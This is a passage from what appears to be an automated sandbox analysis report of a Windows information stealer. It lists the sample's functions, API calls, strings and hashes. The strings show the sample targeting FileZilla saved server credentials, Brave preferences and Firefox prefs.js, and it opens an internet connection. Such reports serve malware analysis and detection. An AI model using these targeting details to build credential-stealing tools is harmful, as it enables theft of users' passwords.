                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 313953988-555421843
                                  • Opcode ID: 34ac9f7c5e9157e1a57f8fe0cfcf2d50d11a368976851c7b00d2cdaad4437086
                                  • Instruction ID: 67812bffe5a78e4fba2d47812fca8420ecec83844f35e1410999fc1abf09377e
                                  • Opcode Fuzzy Hash: 34ac9f7c5e9157e1a57f8fe0cfcf2d50d11a368976851c7b00d2cdaad4437086
                                  • Instruction Fuzzy Hash: 06429570A11206ABCB23ABB4EC4AEAF7BB9AF54701F854414FC05EB251DF34D949DB60
                                  Function 0034DB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DBEF
                                  • lstrlen.KERNEL32(00374CA8), ref: 0034DBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DC17
                                  • lstrcat.KERNEL32(00000000,00374CA8), ref: 0034DC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DC4C
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DC8F
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0034DCD0
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0034DCF0
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 0034DD0A
                                  • lstrlen.KERNEL32(0036CFEC), ref: 0034DD1D
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DD7B
                                  • lstrlen.KERNEL32(00371794), ref: 0034DD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DDA3
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DDAF
                                  • lstrlen.KERNEL32(?), ref: 0034DDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 0034DDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DE19
                                  • lstrlen.KERNEL32(00371794), ref: 0034DE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034DE6F
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DE7B
                                  • lstrlen.KERNEL32(00FA89E8), ref: 0034DE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DEBB
                                  • lstrlen.KERNEL32(00371794), ref: 0034DEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034DEE6
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DEF2
                                  • lstrlen.KERNEL32(00FA87F8), ref: 0034DF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DFA5
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DFB1
                                  • lstrlen.KERNEL32(00FA89E8), ref: 0034DFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DFF4
                                  • lstrlen.KERNEL32(00371794), ref: 0034DFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E022
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034E02E
                                  • lstrlen.KERNEL32(00FA87F8), ref: 0034E03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034E06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 0034E0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 0034E0E7
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034E11F
                                  • lstrlen.KERNEL32(00FAC6B0), ref: 0034E12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E155
                                  • lstrcat.KERNEL32(00000000,?), ref: 0034E15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E19F
                                  • lstrcat.KERNEL32(00000000), ref: 0034E1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0034E1F9
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034E22F
                                  • lstrlen.KERNEL32(00FA8858), ref: 0034E23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E261
                                  • lstrcat.KERNEL32(00000000,00FA8858), ref: 0034E269
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0034E988
                                  • FindClose.KERNEL32(00000000), ref: 0034E997
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                  • String ID: Brave$Preferences$\Brave\Preferences
                                  • API String ID: 1346089424-1230934161
                                  • Opcode ID: 56ed9bec6ed5ad5573987cde6b0e0c137f4324a6bd6a0b683160ed6e6b955507
                                  • Instruction ID: 9b5adc94fd7117a7c0e69af83b4b36f45227a5f4bf43e213c1a8a1b2cf3a44e4
                                  • Opcode Fuzzy Hash: 56ed9bec6ed5ad5573987cde6b0e0c137f4324a6bd6a0b683160ed6e6b955507
                                  • Instruction Fuzzy Hash: A5526D71A102069BCB22EF64DC89AAF7BF9AF54300F454528F849AF251DB34FC55DBA0
                                  Function 003460D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003460FF
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00346152
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00346185
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003461B5
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003461F0
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00346223
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00346233
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: 2f8ef9c98b7b70f184b236ce9c1383645e6c52f513883d20e53e10003de80e0b
                                  • Instruction ID: 8d59c279cc576b21e84c18a19ce891e0a762765942c05a425d44ad2b89ccba88
                                  • Opcode Fuzzy Hash: 2f8ef9c98b7b70f184b236ce9c1383645e6c52f513883d20e53e10003de80e0b
                                  • Instruction Fuzzy Hash: 6E525B71910216ABCB22EFA4EC49AAF77F9AF15300F558424F809AF251DB34FC45DBA1
                                  Function 00356B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356B9D
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356BCD
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356BFD
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356C2F
                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00356C3C
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00356C43
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00356C5A
                                  • lstrlen.KERNEL32(00000000), ref: 00356C65
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356CA8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356CCF
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00356CE2
                                  • lstrlen.KERNEL32(00000000), ref: 00356CED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356D30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356D57
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00356D6A
                                  • lstrlen.KERNEL32(00000000), ref: 00356D75
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356DB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356DDF
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00356DF2
                                  • lstrlen.KERNEL32(00000000), ref: 00356E01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356E49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356E71
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00356E94
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00356EA8
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00356EC9
                                  • LocalFree.KERNEL32(00000000), ref: 00356ED4
                                  • lstrlen.KERNEL32(?), ref: 00356F6E
                                  • lstrlen.KERNEL32(?), ref: 00356F81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 2641759534-2314656281
                                  • Opcode ID: 32c0b03af63cf2918e489a7f7bc9d78ff995e704b70c83f7b2fc0dd5bc89acd3
                                  • Instruction ID: e9ef075cc22794b84da66db77041f039e9971e96b8cd74cd617503fee313fc3d
                                  • Opcode Fuzzy Hash: 32c0b03af63cf2918e489a7f7bc9d78ff995e704b70c83f7b2fc0dd5bc89acd3
                                  • Instruction Fuzzy Hash: 2302B230A11205ABCB22ABB4EC4EEAF7BB9AF14701F454454FC05EB251DF34E949DB60
                                  Function 00354B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00354B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00354B7F
                                  • lstrlen.KERNEL32(00374CA8), ref: 00354B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354BA7
                                  • lstrcat.KERNEL32(00000000,00374CA8), ref: 00354BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00354BFA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 2567437900-3783873740
                                  • Opcode ID: c1c5b749861b6c94a541f5f521be456068282c94132d6b10c4d8494d3129a9eb
                                  • Instruction ID: b937960ab98e42526b9b5fefcd72abe4fab03b94c2685535e311d3c28d435062
                                  • Opcode Fuzzy Hash: c1c5b749861b6c94a541f5f521be456068282c94132d6b10c4d8494d3129a9eb
                                  • Instruction Fuzzy Hash: 9C925F70A016018FDB26CF29D958F6AB7F5AF44316F5A80ADEC099B271D731EC85CB90
                                  Function 00351250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00351291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003512B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003512BF
                                  • lstrlen.KERNEL32(00374CA8), ref: 003512CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003512E7
                                  • lstrcat.KERNEL32(00000000,00374CA8), ref: 003512F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0035133A
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0035135C
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 00351376
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003513AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003513D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003513E2
                                  • lstrlen.KERNEL32(00371794), ref: 003513ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035140A
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351416
                                  • lstrlen.KERNEL32(?), ref: 00351423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351443
                                  • lstrcat.KERNEL32(00000000,?), ref: 00351451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035147A
                                  • StrCmpCA.SHLWAPI(?,00FAC6F8), ref: 003514A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003514E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351535
                                  • StrCmpCA.SHLWAPI(?,00FAD470), ref: 00351552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00351593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003515BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003515E4
                                  • StrCmpCA.SHLWAPI(?,00FAC668), ref: 00351602
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351633
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035165C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00351685
                                  • StrCmpCA.SHLWAPI(?,00FAC518), ref: 003516B3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003516F4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035171D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351745
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00351796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003517BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003517F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0035181C
                                  • FindClose.KERNEL32(00000000), ref: 0035182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: 2e5ca9da05a5bbce62994dd785182f9114e568fd0d6c5c43eb388852bbc72467
                                  • Instruction ID: 5d4e6b92a3e5aece94c6a32a4f39f91722b6c33866ef69443412447e7757b0d7
                                  • Opcode Fuzzy Hash: 2e5ca9da05a5bbce62994dd785182f9114e568fd0d6c5c43eb388852bbc72467
                                  • Instruction Fuzzy Hash: 001253719102069BCB26EF78DC49EAF77F4AF44301F454528FC4AAB250DB34EC599BA0
                                  Function 0035CBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0035CBFC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0035CC13
                                  • lstrcat.KERNEL32(?,?), ref: 0035CC5F
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0035CC71
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 0035CC8B
                                  • wsprintfA.USER32 ref: 0035CCB0
                                  • PathMatchSpecA.SHLWAPI(?,00FA8918), ref: 0035CCE2
                                  • CoInitialize.OLE32(00000000), ref: 0035CCEE
                                    • Part of subcall function 0035CAE0: CoCreateInstance.COMBASE(0036B110,00000000,00000001,0036B100,?), ref: 0035CB06
                                    • Part of subcall function 0035CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0035CB46
                                    • Part of subcall function 0035CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0035CBC9
                                  • CoUninitialize.COMBASE ref: 0035CD09
                                  • lstrcat.KERNEL32(?,?), ref: 0035CD2E
                                  • lstrlen.KERNEL32(?), ref: 0035CD3B
                                  • StrCmpCA.SHLWAPI(?,0036CFEC), ref: 0035CD55
                                  • wsprintfA.USER32 ref: 0035CD7D
                                  • wsprintfA.USER32 ref: 0035CD9C
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 0035CDB0
                                  • wsprintfA.USER32 ref: 0035CDD8
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0035CDF1
                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0035CE10
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 0035CE28
                                  • CloseHandle.KERNEL32(00000000), ref: 0035CE33
                                  • CloseHandle.KERNEL32(00000000), ref: 0035CE3F
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0035CE54
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035CE94
                                  • FindNextFileA.KERNEL32(?,?), ref: 0035CF8D
                                  • FindClose.KERNEL32(?), ref: 0035CF9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
